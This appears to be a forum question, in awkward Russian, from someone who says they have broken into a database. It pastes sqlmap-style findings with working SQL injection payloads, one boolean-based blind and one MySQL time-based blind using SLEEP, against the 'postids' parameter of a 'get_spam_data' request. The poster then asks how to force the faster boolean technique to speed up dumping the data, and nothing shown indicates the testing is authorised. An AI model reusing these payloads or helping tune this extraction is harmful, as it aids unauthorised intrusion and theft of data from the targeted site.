Итак, мне удалось взломать базу данных, и я получил следующие уязвимости
Parameter: postids (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: d=1&cmd=get_spam_data&postids=(SELECT (CASE WHEN (1972=1972) THEN 2 ELSE (SELECT 1472 UNION SELECT 7373) END))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: d=1&cmd=get_spam_data&postids=2 AND (SELECT 9066 FROM (SELECT(SLEEP(5)))VKKG)
Когда я запускаю запрос к базе данных, он, по-видимому, по умолчанию основывается на времени, а не на более быстрой логической основе. Я не заинтересован в том, чтобы ждать час для поиска в базе данных. Я пробовал значение по умолчанию --technique, которое вначале выполняет логическое значение, но по-прежнему использует значение по умолчанию.